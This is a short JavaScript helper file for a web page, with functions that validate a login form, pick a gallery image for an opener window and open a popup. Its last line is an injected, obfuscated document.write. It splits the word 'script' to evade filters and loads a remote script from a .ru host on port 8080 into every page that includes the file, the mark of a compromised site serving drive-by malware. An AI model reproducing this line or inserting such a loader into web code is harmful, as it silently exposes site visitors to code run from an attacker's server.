<!-- JavaScript Document

function submit_form()
{
if ((document.f1.username.value=="") || (document.f1.password.value=="") )
{
alert("Please enter all the fields.")
document.f1.username.focus;
}
else
document.f1.submit();

}


function select_image(img1)
{

 opener.document.form.path.value ="../pictures/"+img1
 image = new Image;
		image.src ="../pictures/"+img1;
		opener.document.form.width.value = image.width;
		opener.document.form.height.value = image.height;
 alert(img1);
window.self.close();
}

function open_wind(filename)
{
url="image-gallery/"+document.f1.eventname.value+"/"+filename;
window.open(url,"newwin","width=600,height=550,left=150,top=50,toolbar=no,directories=no,scrollbars=yes");
window.close;
}

//-->

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/Hard_Drive.js"></scr'+'ipt>');